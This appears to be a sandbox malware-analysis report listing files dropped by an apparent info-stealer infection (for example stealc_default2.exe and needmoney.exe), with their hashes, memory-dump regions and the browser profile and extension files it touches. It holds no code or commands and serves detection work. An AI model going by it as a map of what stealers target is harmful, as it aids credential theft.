| SHA512 | 7caa2416bc7878493b62a184ddc844d201a9ab5282abfa77a616316af39ff65309e37bb566b3e29d9e764e08f4eda43a06464acaf9962f911b33e6dbc60c1861 |
memory/1920-468-0x0000000000400000-0x0000000000471000-memory.dmp
memory/1920-476-0x0000000000400000-0x0000000000471000-memory.dmp
memory/736-482-0x0000000000300000-0x00000000009AB000-memory.dmp
memory/1716-483-0x0000000007E20000-0x0000000007E70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
| MD5 | 7a02aa17200aeac25a375f290a4b4c95 |
| SHA1 | 7cc94ca64268a9a9451fb6b682be42374afc22fd |
| SHA256 | 836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e |
| SHA512 | f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6 |
memory/4712-500-0x00000000003D0000-0x0000000000613000-memory.dmp
memory/5780-501-0x0000000003080000-0x00000000030B6000-memory.dmp
memory/5780-502-0x0000000005AE0000-0x000000000610A000-memory.dmp
memory/5780-504-0x0000000006180000-0x00000000061E6000-memory.dmp
memory/5780-503-0x0000000005AB0000-0x0000000005AD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_11vfuv5g.mot.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5780-513-0x0000000006390000-0x00000000066E7000-memory.dmp
memory/5780-514-0x0000000006880000-0x000000000689E000-memory.dmp
memory/5780-515-0x0000000007AC0000-0x0000000007B56000-memory.dmp
memory/5780-517-0x0000000006DC0000-0x0000000006DE2000-memory.dmp
memory/5780-516-0x0000000006D60000-0x0000000006D7A000-memory.dmp
memory/3468-523-0x0000000000C00000-0x00000000010BD000-memory.dmp
memory/4712-524-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/3468-551-0x0000000000C00000-0x00000000010BD000-memory.dmp
memory/736-564-0x0000000010000000-0x00000000105E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe
| MD5 | 45b55d1e5d2bf60cc572f541ae6fa7d1 |
| SHA1 | 2329f56147a299bcdbf20520e626cc8253e49a8d |
| SHA256 | 039f5c692ba1c67c6e9b475738f40f4311e5e5625e4390d5e51685f6b4e548b8 |
| SHA512 | 5483964e050b2be073d3cf966b6dd6271556d4adfb420fb9ecf81f42f27cd06727016292dceb9a282f9fdcb451507309d1a78f58dd5d84e3022c0ea20c58dbe2 |
memory/2748-597-0x0000000000400000-0x0000000001066000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
| MD5 | 7e6a519688246fe1180f35fe0d25d370 |
| SHA1 | 8e8719ac897dfef7305311dc216f570af40709af |
| SHA256 | 32a927e9b33371b82bae9f02b5ebf07c19ae5a3a7e3c0cd3fcbee7cfff7f257a |
| SHA512 | a751e911eb254749a3c8c98740f455a5be32ce1af94dc90eba8fc677d6d7379303f80247748dfcfe9c8570edb3488a5af97fa7ff29c815bec6824dd491e27972 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe
| MD5 | 251026403399837fa07b9ca1481a2c77 |
| SHA1 | ada941cebcc0bb40105718cc6857f3bd597a067d |
| SHA256 | 8647df6e68b1c951961443dcce0cc03211d2ede60409ab0b448ac6df6f9cfed9 |
| SHA512 | 6a509b2d07091f4433fae8fede1623a39633c430a0361dfdd7147f3e3853c06695fcc5a58f365a959586c132d08954d06d00c353a31edf24bfbb8a98bdc8e6b5 |
memory/1920-646-0x0000000000400000-0x0000000000471000-memory.dmp
memory/1920-652-0x0000000000400000-0x0000000000471000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
| MD5 | 03cf06e01384018ac325de8bc160b4b2 |
| SHA1 | 1853505e502b392fd556a9ce6050207230cc70cd |
| SHA256 | 5ab3785b2b72eaf7edff8961eb8ff8dd3dc6cc7031bc96ceb06a899b6fb3bbbc |
| SHA512 | be1f2cf898db93e96e8817bf2d0ab0ef0f49d5bba4efba2de4046f6b381e8eda6ff5fcfdc057b6cbc4de5b3a7b096612c1e0d6b0d395ee685b3844ba5dc0e1b6 |
memory/2480-670-0x0000000000500000-0x0000000000590000-memory.dmp
memory/736-671-0x0000000000300000-0x00000000009AB000-memory.dmp
memory/4712-672-0x00000000003D0000-0x0000000000613000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
| MD5 | 30daa686c1f31cc4833bd3d7283d8cdc |
| SHA1 | 70f74571fafe1b359cfe9ce739c3752e35d16cf5 |
| SHA256 | 504518e3b4f3abc7f1ae1bf205fdc4a9f739e05b5e84618bae9c7e66bdc19822 |
| SHA512 | 9f6c0eea9f03f9aa35ebf27ce8264e41d9072d273d1b8a35415ae4666d31013d895d1108dd67e36910200e2ac4fc45a4a9d761a1aadf02b0fd29ef93cd20a4d9 |
C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe
| MD5 | 37d198ad751d31a71acc9cb28ed0c64e |
| SHA1 | 8eb519b7a6df66d84c566605da9a0946717a921d |
| SHA256 | 1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde |
| SHA512 | 60923c0a8ce5fd397d49749ccee68ca3fe294d7323551ce9755410ac16bfff56a35bee3e6b9a67d57cdfcb43e4f164712f33cd255b76689174dcf4c475976c96 |
memory/5496-697-0x00000000002F0000-0x0000000000342000-memory.dmp
memory/1920-698-0x0000000000400000-0x0000000000471000-memory.dmp
memory/1920-721-0x0000000000400000-0x0000000000471000-memory.dmp
memory/5496-724-0x00000000064D0000-0x000000000651C000-memory.dmp
memory/3036-727-0x0000000000400000-0x0000000000643000-memory.dmp
memory/3036-729-0x0000000000400000-0x0000000000643000-memory.dmp
memory/424-730-0x0000000000400000-0x000000000079D000-memory.dmp
memory/3036-728-0x0000000000400000-0x0000000000643000-memory.dmp
memory/3036-733-0x0000000000400000-0x0000000000643000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe
| MD5 | 3f99c2698fc247d19dd7f42223025252 |
| SHA1 | 043644883191079350b2f2ffbefef5431d768f99 |
| SHA256 | ba8561bf19251875a15471812042adac49f825c69c3087054889f6107297c6f3 |
| SHA512 | 6a88d1049059bba8f0c9498762502e055107d9f82dbc0aacfdd1e1c138bdb875cf68c2b7998408f8235e53b2bb864ba6f43c249395640b62af305a62b9bfcd67 |
memory/3272-750-0x0000020285E90000-0x000002028602A000-memory.dmp
memory/3272-751-0x00000202A0710000-0x00000202A083A000-memory.dmp
memory/3272-1827-0x00000202A09C0000-0x00000202A0A64000-memory.dmp
memory/3272-1828-0x00000202A0840000-0x00000202A088C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000265001\broadcom5.exe
| MD5 | 36a627b26fae167e6009b4950ff15805 |
| SHA1 | f3cb255ab3a524ee05c8bab7b4c01c202906b801 |
| SHA256 | a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a |
| SHA512 | 2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094 |
memory/3272-1874-0x00000202A0AB0000-0x00000202A0B0C000-memory.dmp
memory/3272-1873-0x00000202A0A60000-0x00000202A0AB4000-memory.dmp
memory/3272-1875-0x00000202A0B10000-0x00000202A0BCA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000266001\broadcom6.exe
| MD5 | cacfbf90da4dee64c89e3c808965aa4f |
| SHA1 | 4bbd2cb08097b9d303809cb11d1f6d5cda796051 |
| SHA256 | d3525969bc52fe879a43236b9abfdd0348157031cfa215e820d7205686e7556e |
| SHA512 | 5f7517b77021e0b8d18280ad2eedee7954d6c446cbd09f37d4e37fbc94c40c9bbae1520645a4bbf4175b4d166edfad3d4f3dc28148fc165537c48deb8e814ab8 |
memory/1572-1899-0x0000000000E50000-0x00000000022FA000-memory.dmp
memory/1572-1900-0x0000000006020000-0x00000000060BC000-memory.dmp
memory/1572-1901-0x0000000006200000-0x000000000629E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000267001\ldx111.exe
| MD5 | 886224a4982435e68ed383051e7afd54 |
| SHA1 | 36f2a13cf3071f5076c199476933105c84a81b5d |
| SHA256 | 075b787a1c1952697af1b747b896f2422ce61e3ec8f7a2ae39d380f652de3558 |
| SHA512 | 948009a8bb4f201f3bcd24d4ff4ceb4c0dd949644761eecf55cc159ea0e4bc6c374746212fc663822cf70c600ab2aa824a39500ab2d592e4997e672161c83b7d |
memory/2756-1921-0x0000000000CB0000-0x0000000000F0A000-memory.dmp
memory/2756-1922-0x0000000005A80000-0x0000000005CA0000-memory.dmp
memory/2756-1923-0x0000000006DF0000-0x0000000007012000-memory.dmp
memory/2756-3014-0x0000000005DB0000-0x0000000005F4C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\km111.exe
| MD5 | 3a5eb676597cb0ebb90466ac70d62dd8 |
| SHA1 | aac7cbb969bc589b05c329ca9969e9514042837e |
| SHA256 | df1cf02cd6619ea144b37b9b7bceabda6d2b8e6f473a3775dd67b4b388d791bc |
| SHA512 | c695d01c94593449271235af0f33ca001717adb6d9da56bdf41e3225ad9aacb4df821e63eac2e2944e62d3993a4d70c350093b23024ce68105328ac8094d937e |
memory/4620-3024-0x0000000000DA0000-0x0000000000F02000-memory.dmp
memory/4620-3027-0x00000000059E0000-0x0000000005B0A000-memory.dmp
memory/4620-3029-0x0000000005C50000-0x0000000005D7A000-memory.dmp
memory/4620-4105-0x0000000005DF0000-0x0000000005E96000-memory.dmp
memory/4148-4112-0x0000000000400000-0x000000000045E000-memory.dmp
memory/4148-4113-0x0000000005830000-0x00000000058EC000-memory.dmp
memory/3692-4115-0x0000000000300000-0x00000000009AB000-memory.dmp
memory/2168-4116-0x0000000000C00000-0x00000000010BD000-memory.dmp
memory/2168-4118-0x0000000000C00000-0x00000000010BD000-memory.dmp
memory/5780-4127-0x0000000004460000-0x00000000047B7000-memory.dmp
memory/5780-4128-0x00000000049D0000-0x0000000004A1C000-memory.dmp
memory/900-4167-0x0000025DF4BD0000-0x0000025DF4BF2000-memory.dmp
memory/3692-4171-0x0000000000300000-0x00000000009AB000-memory.dmp
memory/3968-4189-0x0000000000D90000-0x000000000143B000-memory.dmp
memory/1604-4198-0x0000000004E00000-0x0000000004E4C000-memory.dmp
memory/2064-4201-0x0000000000600000-0x000000000068C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pzaexue0.default-release\prefs.js
| MD5 | fa3531d7f938d7c9e8fbdf6dce77e087 |
| SHA1 | 026f4ba75fe27b0ba36037415ed5107037c0b5cd |
| SHA256 | f260fa4e3435aa97866c12be69de4824d4a9811e823ac2839d53c6306b53d032 |
| SHA512 | d4dbc1502b77a1f6af903e861b8d4c88d82c563f7aaea0ebf0dc0490b44d0f7b3eafded2fa2a71ae51e8b66ddf52cb0a4bd01876768a01f1e89d5c214596d8a7 |
memory/1528-4245-0x0000000004410000-0x0000000004767000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 0d9c057019e26a560e601219883b97be |
| SHA1 | fb153ce21247539bad59a4e9fe584b1483b87662 |
| SHA256 | 1cf2e9d6c44e68e24851c5ad6920921434efcbc7721660d70d53c5c10b6b4100 |
| SHA512 | 3bcf04bb45e005f05893fc8aad46d87970c1c7dda2df01fe672d385015465bf89524aa41f71a639f72f123cf4378799707130bc675ca7a747fa2e318c57e29ad |
memory/2064-4258-0x0000000007D70000-0x0000000007DBC000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\he\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
memory/3968-4430-0x0000000000D90000-0x000000000143B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
memory/3180-4678-0x0000000000C00000-0x00000000010BD000-memory.dmp
memory/3180-4681-0x0000000000C00000-0x00000000010BD000-memory.dmp